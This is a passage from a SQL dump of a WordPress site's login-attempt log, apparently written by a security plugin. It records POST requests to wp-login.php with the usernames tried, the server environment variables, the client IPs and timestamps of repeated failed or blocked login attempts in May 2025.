07:10:31'),(94949,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57008\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746736816.4363911;s:12:\"REQUEST_TIME\";i:1746736816;}}','35.154.1.88',1,'2025-05-09 02:10:18','2025-05-10 07:10:34'),(94950,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"44716\";s:11:\"REMOTE_ADDR\";s:12:\"89.235.79.29\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746736945.071789;s:12:\"REQUEST_TIME\";i:1746736945;}}','89.235.79.29',0,'2025-05-09 02:12:26','1970-01-01 00:00:00'),(94951,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:128:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60864\";s:11:\"REMOTE_ADDR\";s:15:\"186.227.207.161\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746737512.8345809;s:12:\"REQUEST_TIME\";i:1746737512;}}','186.227.207.161',0,'2025-05-09 02:21:54','1970-01-01 00:00:00'),(94952,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51486\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746738016.995353;s:12:\"REQUEST_TIME\";i:1746738016;}}','35.154.1.88',1,'2025-05-09 02:30:18','2025-05-10 07:10:33'),(94953,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51485\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746738016.9926779;s:12:\"REQUEST_TIME\";i:1746738016;}}','35.154.1.88',1,'2025-05-09 02:30:18','2025-05-10 07:10:31'),(94954,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51483\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746738016.9927299;s:12:\"REQUEST_TIME\";i:1746738016;}}','35.154.1.88',1,'2025-05-09 02:30:18','2025-05-10 07:10:32'),(94955,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51487\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746738016.9960539;s:12:\"REQUEST_TIME\";i:1746738016;}}','35.154.1.88',1,'2025-05-09 02:30:18','2025-05-10 07:10:33'),(94956,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51488\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746738018.6791279;s:12:\"REQUEST_TIME\";i:1746738018;}}','35.154.1.88',1,'2025-05-09 02:30:20','2025-05-10 07:10:34'),(94957,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"97\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41400\";s:11:\"REMOTE_ADDR\";s:13:\"182.92.110.55\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746738079.2744801;s:12:\"REQUEST_TIME\";i:1746738079;}}','182.92.110.55',0,'2025-05-09 02:31:20','1970-01-01 00:00:00'),(94958,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57746\";s:11:\"REMOTE_ADDR\";s:14:\"178.22.126.103\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746738651.9004419;s:12:\"REQUEST_TIME\";i:1746738651;}}','178.22.126.103',0,'2025-05-09 02:40:53','1970-01-01 00:00:00'),(94959,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"96\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"34354\";s:11:\"REMOTE_ADDR\";s:14:\"198.54.114.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746739220.685751;s:12:\"REQUEST_TIME\";i:1746739220;}}','198.54.114.126',0,'2025-05-09 02:50:22','1970-01-01 00:00:00'),(94960,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; 